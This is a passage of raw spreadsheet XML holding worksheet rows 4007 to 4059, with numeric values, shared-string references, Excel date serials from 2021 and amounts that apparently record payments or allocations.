      <c r="J4007" t="s">
        <v>12098</v>
      </c>
    </row>
    <row r="4008" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4008">
        <v>24340</v>
      </c>
      <c r="B4008">
        <v>117</v>
      </c>
      <c r="C4008" t="s">
        <v>2280</v>
      </c>
      <c r="D4008" t="s">
        <v>13248</v>
      </c>
      <c r="E4008">
        <v>12</v>
      </c>
      <c r="F4008" t="s">
        <v>4686</v>
      </c>
      <c r="G4008" s="1">
        <v>44286</v>
      </c>
      <c r="H4008">
        <v>5000</v>
      </c>
      <c r="J4008" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4009" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4009">
        <v>24341</v>
      </c>
      <c r="B4009">
        <v>117</v>
      </c>
      <c r="C4009" t="s">
        <v>2280</v>
      </c>
      <c r="D4009" t="s">
        <v>13248</v>
      </c>
      <c r="E4009">
        <v>12</v>
      </c>
      <c r="F4009" t="s">
        <v>609</v>
      </c>
      <c r="G4009" s="1">
        <v>44286</v>
      </c>
      <c r="H4009">
        <v>3000</v>
      </c>
      <c r="J4009" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4010" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4010">
        <v>24342</v>
      </c>
      <c r="B4010">
        <v>117</v>
      </c>
      <c r="C4010" t="s">
        <v>2280</v>
      </c>
      <c r="D4010" t="s">
        <v>13248</v>
      </c>
      <c r="E4010">
        <v>12</v>
      </c>
      <c r="F4010" t="s">
        <v>2236</v>
      </c>
      <c r="G4010" s="1">
        <v>44286</v>
      </c>
      <c r="H4010">
        <v>3000</v>
      </c>
      <c r="J4010" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4011" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4011">
        <v>24343</v>
      </c>
      <c r="B4011">
        <v>117</v>
      </c>
      <c r="C4011" t="s">
        <v>2280</v>
      </c>
      <c r="D4011" t="s">
        <v>13248</v>
      </c>
      <c r="E4011">
        <v>12</v>
      </c>
      <c r="F4011" t="s">
        <v>9437</v>
      </c>
      <c r="G4011" s="1">
        <v>44286</v>
      </c>
      <c r="H4011">
        <v>5000</v>
      </c>
      <c r="J4011" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4012" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4012">
        <v>24344</v>
      </c>
      <c r="B4012">
        <v>117</v>
      </c>
      <c r="C4012" t="s">
        <v>2280</v>
      </c>
      <c r="D4012" t="s">
        <v>13248</v>
      </c>
      <c r="E4012">
        <v>12</v>
      </c>
      <c r="F4012" t="s">
        <v>13250</v>
      </c>
      <c r="G4012" s="1">
        <v>44286</v>
      </c>
      <c r="H4012">
        <v>15000</v>
      </c>
      <c r="J4012" t="s">
        <v>10437</v>
      </c>
    </row>
    <row r="4013" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4013">
        <v>24345</v>
      </c>
      <c r="B4013">
        <v>2557</v>
      </c>
      <c r="C4013" t="s">
        <v>5283</v>
      </c>
      <c r="D4013" t="s">
        <v>10187</v>
      </c>
      <c r="E4013">
        <v>16</v>
      </c>
      <c r="F4013" t="s">
        <v>9497</v>
      </c>
      <c r="G4013" s="1">
        <v>44287</v>
      </c>
      <c r="H4013">
        <v>240000</v>
      </c>
      <c r="J4013" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4014" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4014">
        <v>24347</v>
      </c>
      <c r="B4014">
        <v>1556</v>
      </c>
      <c r="C4014" t="s">
        <v>4397</v>
      </c>
      <c r="D4014" t="s">
        <v>13251</v>
      </c>
      <c r="E4014">
        <v>16</v>
      </c>
      <c r="F4014" t="s">
        <v>673</v>
      </c>
      <c r="G4014" s="1">
        <v>44306</v>
      </c>
      <c r="H4014">
        <v>0</v>
      </c>
      <c r="J4014" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4015" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4015">
        <v>24348</v>
      </c>
      <c r="B4015">
        <v>1556</v>
      </c>
      <c r="C4015" t="s">
        <v>4397</v>
      </c>
      <c r="D4015" t="s">
        <v>13251</v>
      </c>
      <c r="E4015">
        <v>16</v>
      </c>
      <c r="F4015" t="s">
        <v>10007</v>
      </c>
      <c r="G4015" s="1">
        <v>44306</v>
      </c>
      <c r="H4015">
        <v>1260000</v>
      </c>
      <c r="J4015" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="4016" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4016">
        <v>24349</v>
      </c>
      <c r="B4016">
        <v>1556</v>
      </c>
      <c r="C4016" t="s">
        <v>4397</v>
      </c>
      <c r="D4016" t="s">
        <v>13251</v>
      </c>
      <c r="E4016">
        <v>16</v>
      </c>
      <c r="F4016" t="s">
        <v>13252</v>
      </c>
      <c r="G4016" s="1">
        <v>44306</v>
      </c>
      <c r="H4016">
        <v>0</v>
      </c>
      <c r="J4016" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="4017" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4017">
        <v>24350</v>
      </c>
      <c r="B4017">
        <v>1266</v>
      </c>
      <c r="C4017" t="s">
        <v>4410</v>
      </c>
      <c r="D4017" t="s">
        <v>13253</v>
      </c>
      <c r="E4017">
        <v>13</v>
      </c>
      <c r="F4017" t="s">
        <v>1746</v>
      </c>
      <c r="G4017" s="1">
        <v>44354</v>
      </c>
      <c r="H4017">
        <v>250000</v>
      </c>
      <c r="J4017" t="s">
        <v>13254</v>
      </c>
    </row>
    <row r="4018" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4018">
        <v>24351</v>
      </c>
      <c r="B4018">
        <v>1266</v>
      </c>
      <c r="C4018" t="s">
        <v>4410</v>
      </c>
      <c r="D4018" t="s">
        <v>13253</v>
      </c>
      <c r="E4018">
        <v>13</v>
      </c>
      <c r="F4018" t="s">
        <v>9437</v>
      </c>
      <c r="G4018" s="1">
        <v>44354</v>
      </c>
      <c r="H4018">
        <v>250000</v>
      </c>
      <c r="J4018" t="s">
        <v>13254</v>
      </c>
    </row>
    <row r="4019" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4019">
        <v>24352</v>
      </c>
      <c r="B4019">
        <v>1266</v>
      </c>
      <c r="C4019" t="s">
        <v>4410</v>
      </c>
      <c r="D4019" t="s">
        <v>13253</v>
      </c>
      <c r="E4019">
        <v>13</v>
      </c>
      <c r="F4019" t="s">
        <v>13255</v>
      </c>
      <c r="G4019" s="1">
        <v>44354</v>
      </c>
      <c r="H4019">
        <v>400000</v>
      </c>
      <c r="J4019" t="s">
        <v>13254</v>
      </c>
    </row>
    <row r="4020" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4020">
        <v>24353</v>
      </c>
      <c r="B4020">
        <v>1266</v>
      </c>
      <c r="C4020" t="s">
        <v>4410</v>
      </c>
      <c r="D4020" t="s">
        <v>13253</v>
      </c>
      <c r="E4020">
        <v>13</v>
      </c>
      <c r="F4020" t="s">
        <v>13256</v>
      </c>
      <c r="G4020" s="1">
        <v>44354</v>
      </c>
      <c r="H4020">
        <v>100000</v>
      </c>
      <c r="J4020" t="s">
        <v>13254</v>
      </c>
    </row>
    <row r="4021" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4021">
        <v>24354</v>
      </c>
      <c r="B4021">
        <v>1266</v>
      </c>
      <c r="C4021" t="s">
        <v>4410</v>
      </c>
      <c r="D4021" t="s">
        <v>13253</v>
      </c>
      <c r="E4021">
        <v>13</v>
      </c>
      <c r="F4021" t="s">
        <v>9435</v>
      </c>
      <c r="G4021" s="1">
        <v>44354</v>
      </c>
      <c r="H4021">
        <v>100000</v>
      </c>
      <c r="J4021" t="s">
        <v>13254</v>
      </c>
    </row>
    <row r="4022" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4022">
        <v>24355</v>
      </c>
      <c r="B4022">
        <v>1266</v>
      </c>
      <c r="C4022" t="s">
        <v>4410</v>
      </c>
      <c r="D4022" t="s">
        <v>13253</v>
      </c>
      <c r="E4022">
        <v>13</v>
      </c>
      <c r="F4022" t="s">
        <v>9722</v>
      </c>
      <c r="G4022" s="1">
        <v>44354</v>
      </c>
      <c r="H4022">
        <v>50000</v>
      </c>
      <c r="J4022" t="s">
        <v>13254</v>
      </c>
    </row>
    <row r="4023" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4023">
        <v>24358</v>
      </c>
      <c r="B4023">
        <v>1386</v>
      </c>
      <c r="C4023" t="s">
        <v>4123</v>
      </c>
      <c r="D4023" t="s">
        <v>13201</v>
      </c>
      <c r="E4023">
        <v>13</v>
      </c>
      <c r="F4023" t="s">
        <v>13257</v>
      </c>
      <c r="G4023" s="1">
        <v>44291</v>
      </c>
      <c r="H4023">
        <v>5000</v>
      </c>
      <c r="I4023" t="s">
        <v>13258</v>
      </c>
    </row>
    <row r="4024" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4024">
        <v>24360</v>
      </c>
      <c r="B4024">
        <v>1386</v>
      </c>
      <c r="C4024" t="s">
        <v>4123</v>
      </c>
      <c r="D4024" t="s">
        <v>13201</v>
      </c>
      <c r="E4024">
        <v>13</v>
      </c>
      <c r="F4024" t="s">
        <v>13259</v>
      </c>
      <c r="G4024" s="1">
        <v>44291</v>
      </c>
      <c r="H4024">
        <v>2000</v>
      </c>
      <c r="I4024" t="s">
        <v>13260</v>
      </c>
    </row>
    <row r="4025" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4025">
        <v>24362</v>
      </c>
      <c r="B4025">
        <v>1386</v>
      </c>
      <c r="C4025" t="s">
        <v>4123</v>
      </c>
      <c r="D4025" t="s">
        <v>13201</v>
      </c>
      <c r="E4025">
        <v>13</v>
      </c>
      <c r="F4025" t="s">
        <v>13261</v>
      </c>
      <c r="G4025" s="1">
        <v>44291</v>
      </c>
      <c r="H4025">
        <v>5000</v>
      </c>
      <c r="I4025" t="s">
        <v>13260</v>
      </c>
    </row>
    <row r="4026" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4026">
        <v>24364</v>
      </c>
      <c r="B4026">
        <v>5435</v>
      </c>
      <c r="C4026" t="s">
        <v>8634</v>
      </c>
      <c r="D4026" t="s">
        <v>13262</v>
      </c>
      <c r="E4026">
        <v>26</v>
      </c>
      <c r="F4026" t="s">
        <v>13263</v>
      </c>
      <c r="G4026" s="1">
        <v>44287</v>
      </c>
      <c r="H4026">
        <v>120000</v>
      </c>
      <c r="I4026" t="s">
        <v>9522</v>
      </c>
      <c r="J4026" t="s">
        <v>13264</v>
      </c>
    </row>
    <row r="4027" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4027">
        <v>24365</v>
      </c>
      <c r="B4027">
        <v>5435</v>
      </c>
      <c r="C4027" t="s">
        <v>8634</v>
      </c>
      <c r="D4027" t="s">
        <v>13262</v>
      </c>
      <c r="E4027">
        <v>26</v>
      </c>
      <c r="F4027" t="s">
        <v>9590</v>
      </c>
      <c r="G4027" s="1">
        <v>44287</v>
      </c>
      <c r="H4027">
        <v>120000</v>
      </c>
      <c r="I4027" t="s">
        <v>9522</v>
      </c>
      <c r="J4027" t="s">
        <v>10018</v>
      </c>
    </row>
    <row r="4028" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4028">
        <v>24366</v>
      </c>
      <c r="B4028">
        <v>5435</v>
      </c>
      <c r="C4028" t="s">
        <v>8634</v>
      </c>
      <c r="D4028" t="s">
        <v>13262</v>
      </c>
      <c r="E4028">
        <v>26</v>
      </c>
      <c r="F4028" t="s">
        <v>6917</v>
      </c>
      <c r="G4028" s="1">
        <v>44287</v>
      </c>
      <c r="H4028">
        <v>7000</v>
      </c>
      <c r="I4028" t="s">
        <v>9522</v>
      </c>
      <c r="J4028" t="s">
        <v>13265</v>
      </c>
    </row>
    <row r="4029" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4029">
        <v>24367</v>
      </c>
      <c r="B4029">
        <v>5435</v>
      </c>
      <c r="C4029" t="s">
        <v>8634</v>
      </c>
      <c r="D4029" t="s">
        <v>13262</v>
      </c>
      <c r="E4029">
        <v>26</v>
      </c>
      <c r="F4029" t="s">
        <v>9523</v>
      </c>
      <c r="G4029" s="1">
        <v>44287</v>
      </c>
      <c r="H4029">
        <v>24000</v>
      </c>
      <c r="I4029" t="s">
        <v>9485</v>
      </c>
      <c r="J4029" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4030" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4030">
        <v>24372</v>
      </c>
      <c r="B4030">
        <v>1597</v>
      </c>
      <c r="C4030" t="s">
        <v>4375</v>
      </c>
      <c r="D4030" t="s">
        <v>13266</v>
      </c>
      <c r="E4030">
        <v>2</v>
      </c>
      <c r="F4030" t="s">
        <v>1746</v>
      </c>
      <c r="G4030" s="1">
        <v>44287</v>
      </c>
      <c r="H4030">
        <v>269781</v>
      </c>
      <c r="I4030" t="s">
        <v>9536</v>
      </c>
      <c r="J4030" t="s">
        <v>11569</v>
      </c>
    </row>
    <row r="4031" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4031">
        <v>24373</v>
      </c>
      <c r="B4031">
        <v>1597</v>
      </c>
      <c r="C4031" t="s">
        <v>4375</v>
      </c>
      <c r="D4031" t="s">
        <v>13266</v>
      </c>
      <c r="E4031">
        <v>2</v>
      </c>
      <c r="F4031" t="s">
        <v>4950</v>
      </c>
      <c r="G4031" s="1">
        <v>44287</v>
      </c>
      <c r="H4031">
        <v>79880</v>
      </c>
      <c r="J4031" t="s">
        <v>13267</v>
      </c>
    </row>
    <row r="4032" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4032">
        <v>24375</v>
      </c>
      <c r="B4032">
        <v>4790</v>
      </c>
      <c r="C4032" t="s">
        <v>5016</v>
      </c>
      <c r="D4032" t="s">
        <v>13268</v>
      </c>
      <c r="E4032">
        <v>31</v>
      </c>
      <c r="F4032" t="s">
        <v>9459</v>
      </c>
      <c r="G4032" s="1">
        <v>44293</v>
      </c>
      <c r="H4032">
        <v>11600</v>
      </c>
      <c r="I4032" t="s">
        <v>11301</v>
      </c>
    </row>
    <row r="4033" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4033">
        <v>24376</v>
      </c>
      <c r="B4033">
        <v>186</v>
      </c>
      <c r="C4033" t="s">
        <v>1236</v>
      </c>
      <c r="D4033" t="s">
        <v>13269</v>
      </c>
      <c r="E4033">
        <v>12</v>
      </c>
      <c r="F4033" t="s">
        <v>9437</v>
      </c>
      <c r="G4033" s="1">
        <v>44322</v>
      </c>
      <c r="H4033">
        <v>7980</v>
      </c>
      <c r="J4033" t="s">
        <v>13270</v>
      </c>
    </row>
    <row r="4034" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4034">
        <v>24377</v>
      </c>
      <c r="B4034">
        <v>186</v>
      </c>
      <c r="C4034" t="s">
        <v>1236</v>
      </c>
      <c r="D4034" t="s">
        <v>13269</v>
      </c>
      <c r="E4034">
        <v>12</v>
      </c>
      <c r="F4034" t="s">
        <v>13250</v>
      </c>
      <c r="G4034" s="1">
        <v>44322</v>
      </c>
      <c r="H4034">
        <v>3845</v>
      </c>
      <c r="J4034" t="s">
        <v>13271</v>
      </c>
    </row>
    <row r="4035" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4035">
        <v>24378</v>
      </c>
      <c r="B4035">
        <v>186</v>
      </c>
      <c r="C4035" t="s">
        <v>1236</v>
      </c>
      <c r="D4035" t="s">
        <v>13269</v>
      </c>
      <c r="E4035">
        <v>12</v>
      </c>
      <c r="F4035" t="s">
        <v>609</v>
      </c>
      <c r="G4035" s="1">
        <v>44322</v>
      </c>
      <c r="H4035">
        <v>2484</v>
      </c>
      <c r="J4035" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4036" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4036">
        <v>24379</v>
      </c>
      <c r="B4036">
        <v>186</v>
      </c>
      <c r="C4036" t="s">
        <v>1236</v>
      </c>
      <c r="D4036" t="s">
        <v>13269</v>
      </c>
      <c r="E4036">
        <v>12</v>
      </c>
      <c r="F4036" t="s">
        <v>13272</v>
      </c>
      <c r="G4036" s="1">
        <v>44322</v>
      </c>
      <c r="H4036">
        <v>390000</v>
      </c>
      <c r="J4036" t="s">
        <v>13273</v>
      </c>
    </row>
    <row r="4037" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4037">
        <v>24380</v>
      </c>
      <c r="B4037">
        <v>186</v>
      </c>
      <c r="C4037" t="s">
        <v>1236</v>
      </c>
      <c r="D4037" t="s">
        <v>13269</v>
      </c>
      <c r="E4037">
        <v>12</v>
      </c>
      <c r="F4037" t="s">
        <v>2236</v>
      </c>
      <c r="G4037" s="1">
        <v>44322</v>
      </c>
      <c r="H4037">
        <v>71000</v>
      </c>
      <c r="J4037" t="s">
        <v>13274</v>
      </c>
    </row>
    <row r="4038" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4038">
        <v>24381</v>
      </c>
      <c r="B4038">
        <v>186</v>
      </c>
      <c r="C4038" t="s">
        <v>1236</v>
      </c>
      <c r="D4038" t="s">
        <v>13269</v>
      </c>
      <c r="E4038">
        <v>12</v>
      </c>
      <c r="F4038" t="s">
        <v>4686</v>
      </c>
      <c r="G4038" s="1">
        <v>44322</v>
      </c>
      <c r="H4038">
        <v>5000</v>
      </c>
      <c r="J4038" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4039" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4039">
        <v>24384</v>
      </c>
      <c r="B4039">
        <v>5053</v>
      </c>
      <c r="C4039" t="s">
        <v>7857</v>
      </c>
      <c r="D4039" t="s">
        <v>13275</v>
      </c>
      <c r="E4039">
        <v>13</v>
      </c>
      <c r="F4039" t="s">
        <v>12444</v>
      </c>
      <c r="G4039" s="1">
        <v>44253</v>
      </c>
      <c r="H4039">
        <v>1000</v>
      </c>
      <c r="I4039" t="s">
        <v>13276</v>
      </c>
      <c r="J4039" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="4040" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4040">
        <v>24385</v>
      </c>
      <c r="B4040">
        <v>5053</v>
      </c>
      <c r="C4040" t="s">
        <v>7857</v>
      </c>
      <c r="D4040" t="s">
        <v>13275</v>
      </c>
      <c r="E4040">
        <v>13</v>
      </c>
      <c r="F4040" t="s">
        <v>13277</v>
      </c>
      <c r="G4040" s="1">
        <v>44253</v>
      </c>
      <c r="H4040">
        <v>1000</v>
      </c>
      <c r="I4040" t="s">
        <v>13278</v>
      </c>
      <c r="J4040" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="4041" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4041">
        <v>24386</v>
      </c>
      <c r="B4041">
        <v>5427</v>
      </c>
      <c r="C4041" t="s">
        <v>8641</v>
      </c>
      <c r="D4041" t="s">
        <v>13279</v>
      </c>
      <c r="E4041">
        <v>6</v>
      </c>
      <c r="F4041" t="s">
        <v>8643</v>
      </c>
      <c r="G4041" s="1">
        <v>44274</v>
      </c>
      <c r="H4041">
        <v>500</v>
      </c>
      <c r="I4041" t="s">
        <v>9852</v>
      </c>
    </row>
    <row r="4042" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4042">
        <v>24392</v>
      </c>
      <c r="B4042">
        <v>1489</v>
      </c>
      <c r="C4042" t="s">
        <v>4405</v>
      </c>
      <c r="D4042" t="s">
        <v>13280</v>
      </c>
      <c r="E4042">
        <v>33</v>
      </c>
      <c r="F4042" t="s">
        <v>1746</v>
      </c>
      <c r="G4042" s="1">
        <v>44272</v>
      </c>
      <c r="H4042">
        <v>200000</v>
      </c>
      <c r="I4042" t="s">
        <v>13281</v>
      </c>
      <c r="J4042" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4043" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4043">
        <v>24394</v>
      </c>
      <c r="B4043">
        <v>1512</v>
      </c>
      <c r="C4043" t="s">
        <v>4114</v>
      </c>
      <c r="D4043" t="s">
        <v>12866</v>
      </c>
      <c r="E4043">
        <v>16</v>
      </c>
      <c r="F4043" t="s">
        <v>9651</v>
      </c>
      <c r="G4043" s="1">
        <v>44327</v>
      </c>
      <c r="H4043">
        <v>700000</v>
      </c>
      <c r="J4043" t="s">
        <v>13282</v>
      </c>
    </row>
    <row r="4044" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4044">
        <v>24395</v>
      </c>
      <c r="B4044">
        <v>5426</v>
      </c>
      <c r="C4044" t="s">
        <v>8648</v>
      </c>
      <c r="D4044" t="s">
        <v>13283</v>
      </c>
      <c r="E4044">
        <v>16</v>
      </c>
      <c r="F4044" t="s">
        <v>3341</v>
      </c>
      <c r="G4044" s="1">
        <v>44316</v>
      </c>
      <c r="H4044">
        <v>250</v>
      </c>
      <c r="I4044" t="s">
        <v>13284</v>
      </c>
    </row>
    <row r="4045" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4045">
        <v>24404</v>
      </c>
      <c r="B4045">
        <v>1310</v>
      </c>
      <c r="C4045" t="s">
        <v>2473</v>
      </c>
      <c r="D4045" t="s">
        <v>9507</v>
      </c>
      <c r="E4045">
        <v>16</v>
      </c>
      <c r="F4045" t="s">
        <v>7241</v>
      </c>
      <c r="G4045" s="1">
        <v>44267</v>
      </c>
      <c r="H4045">
        <v>480000</v>
      </c>
      <c r="I4045" t="s">
        <v>9550</v>
      </c>
      <c r="J4045" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4046" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4046">
        <v>24405</v>
      </c>
      <c r="B4046">
        <v>5439</v>
      </c>
      <c r="C4046" t="s">
        <v>16527</v>
      </c>
      <c r="D4046" t="s">
        <v>16528</v>
      </c>
      <c r="E4046">
        <v>12</v>
      </c>
      <c r="F4046" t="s">
        <v>9437</v>
      </c>
      <c r="G4046" s="1">
        <v>44306</v>
      </c>
      <c r="H4046" s="4">
        <v>10800000</v>
      </c>
      <c r="I4046" t="s">
        <v>9525</v>
      </c>
      <c r="J4046" t="s">
        <v>13286</v>
      </c>
    </row>
    <row r="4047" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4047">
        <v>24406</v>
      </c>
      <c r="B4047">
        <v>5439</v>
      </c>
      <c r="C4047" t="s">
        <v>16527</v>
      </c>
      <c r="D4047" t="s">
        <v>16528</v>
      </c>
      <c r="E4047">
        <v>12</v>
      </c>
      <c r="F4047" t="s">
        <v>13287</v>
      </c>
      <c r="G4047" s="1">
        <v>44306</v>
      </c>
      <c r="H4047" s="4">
        <v>240000</v>
      </c>
      <c r="I4047" t="s">
        <v>9525</v>
      </c>
      <c r="J4047" t="s">
        <v>13286</v>
      </c>
    </row>
    <row r="4048" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4048">
        <v>24407</v>
      </c>
      <c r="B4048">
        <v>5439</v>
      </c>
      <c r="C4048" t="s">
        <v>16527</v>
      </c>
      <c r="D4048" t="s">
        <v>16528</v>
      </c>
      <c r="E4048">
        <v>12</v>
      </c>
      <c r="F4048" t="s">
        <v>13288</v>
      </c>
      <c r="G4048" s="1">
        <v>44306</v>
      </c>
      <c r="H4048" s="4">
        <v>100000</v>
      </c>
      <c r="I4048" t="s">
        <v>9525</v>
      </c>
      <c r="J4048" t="s">
        <v>13286</v>
      </c>
    </row>
    <row r="4049" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4049">
        <v>24408</v>
      </c>
      <c r="B4049">
        <v>5439</v>
      </c>
      <c r="C4049" t="s">
        <v>109</v>
      </c>
      <c r="D4049" t="s">
        <v>13285</v>
      </c>
      <c r="E4049">
        <v>12</v>
      </c>
      <c r="F4049" t="s">
        <v>9459</v>
      </c>
      <c r="G4049" s="1">
        <v>44306</v>
      </c>
      <c r="H4049">
        <v>0</v>
      </c>
      <c r="I4049" t="s">
        <v>9952</v>
      </c>
      <c r="J4049" t="s">
        <v>13286</v>
      </c>
    </row>
    <row r="4050" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4050">
        <v>24409</v>
      </c>
      <c r="B4050">
        <v>5439</v>
      </c>
      <c r="C4050" t="s">
        <v>109</v>
      </c>
      <c r="D4050" t="s">
        <v>13285</v>
      </c>
      <c r="E4050">
        <v>12</v>
      </c>
      <c r="F4050" t="s">
        <v>1746</v>
      </c>
      <c r="G4050" s="1">
        <v>44306</v>
      </c>
      <c r="H4050">
        <v>100</v>
      </c>
      <c r="I4050" t="s">
        <v>9550</v>
      </c>
      <c r="J4050" t="s">
        <v>13286</v>
      </c>
    </row>
    <row r="4051" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4051">
        <v>24410</v>
      </c>
      <c r="B4051">
        <v>5439</v>
      </c>
      <c r="C4051" t="s">
        <v>109</v>
      </c>
      <c r="D4051" t="s">
        <v>13285</v>
      </c>
      <c r="E4051">
        <v>12</v>
      </c>
      <c r="F4051" t="s">
        <v>9681</v>
      </c>
      <c r="G4051" s="1">
        <v>44306</v>
      </c>
      <c r="H4051">
        <v>100</v>
      </c>
      <c r="I4051" t="s">
        <v>9550</v>
      </c>
      <c r="J4051" t="s">
        <v>13286</v>
      </c>
    </row>
    <row r="4052" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4052">
        <v>24411</v>
      </c>
      <c r="B4052">
        <v>5439</v>
      </c>
      <c r="C4052" t="s">
        <v>16527</v>
      </c>
      <c r="D4052" t="s">
        <v>16528</v>
      </c>
      <c r="E4052">
        <v>12</v>
      </c>
      <c r="F4052" t="s">
        <v>10130</v>
      </c>
      <c r="G4052" s="1">
        <v>44306</v>
      </c>
      <c r="H4052" s="4">
        <v>240000</v>
      </c>
      <c r="I4052" t="s">
        <v>9550</v>
      </c>
      <c r="J4052" t="s">
        <v>13286</v>
      </c>
    </row>
    <row r="4053" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4053">
        <v>24412</v>
      </c>
      <c r="B4053">
        <v>92</v>
      </c>
      <c r="C4053" t="s">
        <v>2301</v>
      </c>
      <c r="D4053" t="s">
        <v>13289</v>
      </c>
      <c r="E4053">
        <v>12</v>
      </c>
      <c r="F4053" t="s">
        <v>13290</v>
      </c>
      <c r="G4053" s="1">
        <v>44295</v>
      </c>
      <c r="H4053">
        <v>6000</v>
      </c>
      <c r="J4053" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4054" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4054">
        <v>24414</v>
      </c>
      <c r="B4054">
        <v>92</v>
      </c>
      <c r="C4054" t="s">
        <v>2301</v>
      </c>
      <c r="D4054" t="s">
        <v>13289</v>
      </c>
      <c r="E4054">
        <v>12</v>
      </c>
      <c r="F4054" t="s">
        <v>13291</v>
      </c>
      <c r="G4054" s="1">
        <v>44295</v>
      </c>
      <c r="H4054">
        <v>48000</v>
      </c>
      <c r="J4054" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4055" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4055">
        <v>24415</v>
      </c>
      <c r="B4055">
        <v>92</v>
      </c>
      <c r="C4055" t="s">
        <v>2301</v>
      </c>
      <c r="D4055" t="s">
        <v>13289</v>
      </c>
      <c r="E4055">
        <v>12</v>
      </c>
      <c r="F4055" t="s">
        <v>13292</v>
      </c>
      <c r="G4055" s="1">
        <v>44295</v>
      </c>
      <c r="H4055">
        <v>38000</v>
      </c>
      <c r="J4055" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4056" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4056">
        <v>24416</v>
      </c>
      <c r="B4056">
        <v>92</v>
      </c>
      <c r="C4056" t="s">
        <v>2301</v>
      </c>
      <c r="D4056" t="s">
        <v>13289</v>
      </c>
      <c r="E4056">
        <v>12</v>
      </c>
      <c r="F4056" t="s">
        <v>13293</v>
      </c>
      <c r="G4056" s="1">
        <v>44295</v>
      </c>
      <c r="H4056">
        <v>32000</v>
      </c>
      <c r="J4056" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4057" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4057">
        <v>24417</v>
      </c>
      <c r="B4057">
        <v>92</v>
      </c>
      <c r="C4057" t="s">
        <v>2301</v>
      </c>
      <c r="D4057" t="s">
        <v>13289</v>
      </c>
      <c r="E4057">
        <v>12</v>
      </c>
      <c r="F4057" t="s">
        <v>9527</v>
      </c>
      <c r="G4057" s="1">
        <v>44295</v>
      </c>
      <c r="H4057">
        <v>25000</v>
      </c>
      <c r="J4057" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4058" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4058">
        <v>24418</v>
      </c>
      <c r="B4058">
        <v>92</v>
      </c>
      <c r="C4058" t="s">
        <v>2301</v>
      </c>
      <c r="D4058" t="s">
        <v>13289</v>
      </c>
      <c r="E4058">
        <v>12</v>
      </c>
      <c r="F4058" t="s">
        <v>9437</v>
      </c>
      <c r="G4058" s="1">
        <v>44295</v>
      </c>
      <c r="H4058">
        <v>15000</v>
      </c>
    </row>
    <row r="4059" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4059">
        <v>24423</v>
      </c>
      <c r="B4059">
        <v>29</v>
      </c>
      <c r="C4059" t="s">
        <v>1899</v>
      </c>
      <c r="D4059" t="s">
        <v>13081</v>
      </c>
      <c r="E4059">
        <v>17</v>
      </c>
      <c r="F4059" t="s">
        <v>13294</v>
      </c>
      <c r="G4059" s="1">
        <v>44293</v>
      </c>
      <c r="H4059">
        <v>12000</v>
      </c>
      <c r="J4059" t="s">
